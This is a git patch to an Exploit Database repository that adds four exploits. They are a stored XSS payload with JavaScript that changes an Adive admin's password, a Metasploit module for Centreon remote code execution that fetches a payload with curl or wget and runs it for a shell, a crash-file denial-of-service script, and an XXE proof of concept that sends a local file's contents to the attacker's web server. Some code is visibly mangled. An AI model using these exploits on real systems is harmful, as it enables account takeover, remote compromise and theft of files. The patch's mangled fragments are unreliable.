From b8cbcf2571ac02fc681dc81b05f5b52d2db66816 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 21 Jan 2020 05:02:10 +0000 Subject: [PATCH] DB: 2020-01-21 4 changes to exploits/shellcodes Sysax Multi Server 5.50 - Denial of Service (PoC) Easy XML Editor 1.7.8 - XML External Entity Injection Adive Framework 2.0.8 - Persistent Cross-Site Scripting Centreon 19.04 - Authenticated Remote Code Execution (Metasploit) --- exploits/php/webapps/47946.txt | 88 ++++++++++++++++ exploits/php/webapps/47948.rb | 185 +++++++++++++++++++++++++++++++++ exploits/windows/dos/47947.py | 27 +++++ exploits/xml/local/47945.txt | 61 +++++++++++ files_exploits.csv | 4 + 5 files changed, 365 insertions(+) create mode 100644 exploits/php/webapps/47946.txt create mode 100755 exploits/php/webapps/47948.rb create mode 100755 exploits/windows/dos/47947.py create mode 100644 exploits/xml/local/47945.txt diff --git a/exploits/php/webapps/47946.txt b/exploits/php/webapps/47946.txt new file mode 100644 index 000000000..398a24b1e --- /dev/null +++ b/exploits/php/webapps/47946.txt @@ -0,0 +1,88 @@ +# Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting +# Exploit Author: Sarthak Saini +# Dork: N/A +# Date: 2020-01-18 +# Vendor Link : https://www.adive.es/ +# Software Link: https://github.com/ferdinandmartin/adive-php7 +# Version: 2.0.8 +# Category: Webapps +# Tested on: windows64bit / mozila firefox + +1) Persistent Cross-site Scripting at user add page + +Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting + +Payload:- + +POST /admin/user/add HTTP/1.1 +Host: 192.168.2.5 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 62 +Origin: http://192.168.2.5 +DNT: 1 +Connection: close +Referer: http://192.168.2.5/admin/user/add +Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 +Upgrade-Insecure-Requests: 1 + +userName=test&userUsername=&pass=test&cpass=test&permission=3 + + +|---------------------------------------------------------------------------------- + + +2) account takeover - cross side request forgery + + +Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger. + +-> Save the payload as exp.js + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- +function execute() +{ + var nuri ="http://192.168.2.5/admin/config"; + xhttp = new XMLHttpRequest(); + xhttp.open("POST", nuri, true); + xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + xhttp.withCredentials = "true"; + var body = ""; + body += "\r\n\r\n"; + body += + "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web"; + xhttp.send(body); + return true; +} + +execute(); +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- + +-> Start a server and host the exp.js. Send the exp.js file in the xss payload + +Payload:- + +POST /admin/user/add HTTP/1.1 +Host: 192.168.2.5 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 143 +Origin: http://192.168.2.5 +DNT: 1 +Connection: close +Referer: http://192.168.2.5/admin/user/add +Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 +Upgrade-Insecure-Requests: 1 + +userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3 + + +-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123 + +|-----------------------------------------EOF----------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/47948.rb b/exploits/php/webapps/47948.rb new file mode 100755 index 000000000..07edb76aa --- /dev/null +++ b/exploits/php/webapps/47948.rb @@ -0,0 +1,185 @@ +#################################################################### +# This module requires Metasploit: https://metasploit.com/download # +# Current source: https://github.com/rapid7/metasploit-framework # +#################################################################### + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution", + "Description" => %q{ + Authenticated Remote Code Execution on Centreon Web Appliances. + Affected versions: =< 18.10, 19.04 + By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache. + Vendor verified: 09/17/2019 + Vendor patched: 10/16/2019 + Public disclosure: 10/18/2019 + }, + "License" => MSF_LICENSE, + 'Author' => [ + 'TheCyberGeek', # Discovery + 'enjloezz' # Discovery and Metasploit Module + ], + 'References' => + [ + ['URL','https://github.com/centreon/centreon/pull/7864'], + ['CVE','2019-16405'] + ], + "Platform" => "linux", + "Targets" => [ + ["Centreon", {}], + ], + "Stance" => Msf::Exploit::Stance::Aggressive, + "Privileged" => false, + "DisclosureDate" => "Oct 19 2019", + "DefaultOptions" => { + "SRVPORT" => 80, + }, + "DefaultTarget" => 0 + )) + + register_options( + [ + OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]), + OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]), + OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]), + OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]), + OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]), + ] + ) + end + + def exploit + begin + res = send_request_cgi( + "uri" => normalize_uri(target_uri.path, "index.php"), + "method" => "GET", + ) + @phpsessid = res.get_cookies + /centreon_token\".*value=\"(?.*?)\"/ =~ res.body + + unless token + vprint_error("Couldn't get token, check your TARGETURI") + return + end + res = send_request_cgi!( + "uri" => normalize_uri(target_uri.path, "index.php"), + "method" => "POST", + "cookie" => @phpsessid, + "vars_post" => { + "useralias" => datastore["USERNAME"], + "password" => datastore["PASSWORD"], + "centreon_token" => token, + }, + ) + unless res.body.include? "You need to enable JavaScript to run this app" + fail_with Failure::NoAccess "Cannot login to Centreon" + end + print_good("Login Successful!") + res = send_request_cgi( + "uri" => normalize_uri(target_uri.path, "main.get.php"), + "method" => "GET", + "cookie" => @phpsessid, + "vars_get" => { + "p" => "60904", + "o" => "c", + "resource_id" => 1, + }, + ) + /centreon_token\".*value=\"(?.*?)\"/ =~ res.body + res = send_request_cgi( + "uri" => normalize_uri(target_uri.path, "main.get.php"), + "vars_get" => { + "p" => "60904", + }, + "method" => "POST", + "cookie" => @phpsessid, + "vars_post" => { + "resource_name": "$USER1$", + "resource_line": "/", + "instance_id": 1, + "resource_activate": 1, + "resource_comment": "Nagios Plugins Path", + "submitC": "Save", + "resource_id": 1, + "o": "c", + "initialValues": "" "a:0:{}" "", + "centreon_token": token + }, + ) + begin + Timeout.timeout(datastore["HTTPDELAY"]) { super } + rescue Timeout::Error + vprint_error("Server Timed Out...") + end + rescue ::Rex::ConnectionError + vprint_error("Connection error...") + end + end + + def primer + @pl = generate_payload_exe + @path = service.resources.keys[0] + binding_ip = srvhost_addr + + proto = ssl ? "https" : "http" + payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}" + send_payload(payload_uri) + end + + def send_payload(payload_uri) + payload = "/bin/bash -c \"" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\"" + print_good("Sending Payload") + send_request_cgi( + "uri" => normalize_uri(target_uri.path, "main.get.php"), + "method" => "POST", + "cookie" => @phpsessid, + "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 }, + ) + end + + def on_request_uri(cli, req) + print_good("#{peer} - Payload request received: #{req.uri}") + send_response(cli, @pl) + run_shell + stop_service + end + + def run_shell + print_good("Setting permissions for the payload") + res = send_request_cgi( + "uri" => normalize_uri(target_uri.path, "main.get.php"), + "method" => "POST", + "cookie" => @phpsessid, + "vars_get" => { + "p": "60801", + "command_hostaddress": "", + "command_example": "", + "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"", + "o": "p", + "min": 1, + }, + ) + + print_good("Executing Payload") + res = send_request_cgi( + "uri" => normalize_uri(target_uri.path, "main.get.php"), + "method" => "POST", + "cookie" => @phpsessid, + "vars_get" => { + "p": "60801", + "command_hostaddress": "", + "command_example": "", + "command_line": "/tmp/#{@path}", + "o": "p", + "min": 1, + }, + ) + end +end \ No newline at end of file diff --git a/exploits/windows/dos/47947.py b/exploits/windows/dos/47947.py new file mode 100755 index 000000000..96c19033e --- /dev/null +++ b/exploits/windows/dos/47947.py @@ -0,0 +1,27 @@ +# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC) +# Google Dork: NA +# Date: 2020-01-20 +# Exploit Author: Shailesh Kumavat +# Vendor Homepage: https://www.sysax.com/ +# Software Link: https://www.sysax.com/download.htm#sysaxserv +# Version: Sysax Multi Server 5.50 +# Tested on: WIndow 7 +# CVE : [if applicable] + +1) Download software install in window 7 +2)run software then click install license +3) upload crash.key file and it will show run again this program +4 ) program crash , never run + + +#!/usr/bin/python + +buffer = "A" * 1000 + +payload = buffertry: + f=open("crash.key","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!")except: + print("File cannot be created.") \ No newline at end of file diff --git a/exploits/xml/local/47945.txt b/exploits/xml/local/47945.txt new file mode 100644 index 000000000..5c948f80d --- /dev/null +++ b/exploits/xml/local/47945.txt @@ -0,0 +1,61 @@ +# Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection +# Exploit Author: Javier Olmedo +# Date: 2018-11-21 +# Vendor: Richard Wuerflein +# Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe +# Affected Version: 1.7.8 and before +# Patched Version: unpatched +# Category: Local +# Platform: XML +# Tested on: Windows 10 Pro +# CWE: https://cwe.mitre.org/data/definitions/611.html +# CVE: 2019-19031 +# References: +# https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/ + +# 1. Technical Description +# Easy XML Editor version 1.7.8 and before are affected by XML External Entity Injection vulnerability +# through the malicious XML file. This allows a malicious user to read arbitrary files. + +# 2. Proof Of Concept (PoC) +# 2.1 Start a webserver to receive the connection. + +python -m SimpleHTTPServer 80 + +# 2.2 Upload the payload.dtd file to your web server. + + +"> +%all; + +# 2.3 Create a SECRET.TXT file with any content in desktop. + +# 2.4 Open poc.xml + + +\Desktop\secret.txt"> + +%dtd;]> +&send; + +# 2.5 Your web server will receive a request with the contents of the secret.txt file + +Serving HTTP on 0.0.0.0 port 8000 ... +192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 - +192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 - + +# 3. Timeline +# 13, november 2019 - [RESEARCHER] Discover +# 13, november 2019 - [RESEARCHER] Report to vendor support +# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability +# 15, november 2019 - [RESEARCHER] Detailed vulnerability report +# 22, november 2019 - [RESEARCHER] Public disclosure + +# 4. Disclaimer +# The information contained in this notice is provided without any guarantee of use or otherwise. +# The redistribution of this notice is explicitly permitted for insertion into vulnerability +# databases, provided that it is not modified and due credit is granted to the author. +# The author prohibits the malicious use of the information contained herein and accepts no responsibility. +# All content (c) +# Javier Olmedo \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 693f9e61d..e6dc0411e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6659,6 +6659,7 @@ id,file,description,date,author,type,platform,port 47921,exploits/android/dos/47921.txt,"Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN",2020-01-14,"Google Security Research",dos,android, 47937,exploits/windows/dos/47937.py,"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows, 47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows, +47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10911,6 +10912,7 @@ id,file,description,date,author,type,platform,port 47940,exploits/windows/local/47940.txt,"Trend Micro Maximum Security 2019 - Arbitrary Code Execution",2020-01-17,hyp3rlinx,local,windows, 47943,exploits/windows/local/47943.txt,"Trend Micro Maximum Security 2019 - Privilege Escalation",2020-01-17,hyp3rlinx,local,windows, 47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows, +47945,exploits/xml/local/47945.txt,"Easy XML Editor 1.7.8 - XML External Entity Injection",2020-01-20,"Javier Olmedo",local,xml, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42245,3 +42247,5 @@ id,file,description,date,author,type,platform,port 47934,exploits/php/webapps/47934.txt,"Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php, 47939,exploits/php/webapps/47939.py,"Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass",2020-01-17,"Raphael Karger",webapps,php, 47941,exploits/php/webapps/47941.py,"Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass",2020-01-17,"B. Canavate",webapps,php, +47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php, +47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php,